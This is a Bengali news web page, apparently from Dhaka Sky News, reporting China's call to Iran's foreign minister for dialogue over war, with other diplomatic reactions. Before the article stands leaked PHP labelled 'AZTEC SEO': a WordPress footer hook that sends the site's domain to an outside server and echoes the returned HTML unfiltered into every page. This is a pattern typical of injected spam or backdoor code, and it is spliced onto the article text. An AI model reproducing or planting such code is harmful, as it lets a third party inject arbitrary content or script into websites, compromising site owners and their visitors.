/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); সংলাপ যুদ্ধের চেয়ে ভালো: ইরানের পররাষ্ট্রমন্ত্রীকে চীন | Dhaka Sky News

সংসার ভাঙল অভিনেত্রী মৌসুমী হামিদের

আগের সংবাদ

দক্ষিণ লেবানন দখল পরিকল্পনা নিয়ে ইসরাইলকে সতর্ক করল কানাডা

পরের সংবাদ

সংলাপ যুদ্ধের চেয়ে ভালো: ইরানের পররাষ্ট্রমন্ত্রীকে চীন

আন্তর্জাতিক ডেস্ক

প্রকাশিত: March 25, 2026 , 7:14 pm

সংলাপ যুদ্ধের চেয়ে ভালো: ইরানের পররাষ্ট্রমন্ত্রীকে চীন

চীনের পররাষ্ট্রমন্ত্রী ওয়াং ই। সংগৃহীত ছবি

ইরানে মার্কিন ও ইসরাইলি আগ্রাসন বিশ্বের বৃহৎ এবং আঞ্চলিক শক্তিগুলোর তৎপরতা বাড়িয়ে দিয়েছে, যার ফলে বহু দেশ মধ্যপ্রাচ্যে সংঘাতের মধ্যে জড়িয়েছে। এই যুদ্ধের মধ্যেই চীন যুদ্ধবিরতির জন্য আবারও কূটনৈতিক প্রচেষ্টার তাগিদ দিয়েছে।

মঙ্গলবার চীনের পররাষ্ট্রমন্ত্রী ওয়াং ই ইরানের পররাষ্ট্রমন্ত্রী আব্বাস আরাঘচির সঙ্গে ফোনালাপে বলেছেন, ‘সংলাপ সবসময় যুদ্ধের চেয়ে ভালো’। সব পক্ষকে শান্তির জন্য দ্রুত আলোচনা শুরুর আহ্বান জানান তিনি।

চীনের পররাষ্ট্র মন্ত্রণালয়ের মতে, ওয়াং আরাঘচিকে আরও বলেন, যেকোনো উত্তপ্ত সমস্যা সমাধান করতে হলে কূটনীতি ও আলোচনা প্রয়োজন এবং কোনোভাবেই শক্তি ব্যবহার করা উচিত নয়। এই ফোনালাপটি ইরানের অনুরোধে অনুষ্ঠিত হয় এবং এতে চীন আবারও যুদ্ধবিরতির এবং আলোচনা শুরুর তাগিদ দিয়েছে।

ইরান তার অবস্থান পুনর্ব্যক্ত করে জানায় যে, তারা সাময়িক যুদ্ধবিরতি নয় বরং পুরোপুরি সংঘাতের সমাপ্তি চায়।

এদিকে, মিশরের পররাষ্ট্রমন্ত্রী বদর আবদেলআত্তি মার্কিন রাষ্ট্রদূত স্টিভ উইটকফের সঙ্গে সম্ভাব্য আলোচনার বিষয়ে আলোচনা করেন। তিনি তুরস্ক, পাকিস্তান, ওমান, সৌদি আরব, সংযুক্ত আরব আমিরাত, ফ্রান্স এবং সাইপ্রাসের কর্মকর্তাদের সঙ্গেও কথা বলেছেন।

তুরস্কের প্রেসিডেন্ট রিসেপ তাইয়েপ এরদোগানও বলেছেন, ইসরাইলের ‘অটল, কঠোর, এবং চরম অবস্থান’ কূটনীতির জন্য বিপদ ডেকে আনছে এবং সত্যিকারের আলোচনার মাধ্যমে যুদ্ধের সমাপ্তি হওয়া উচিত।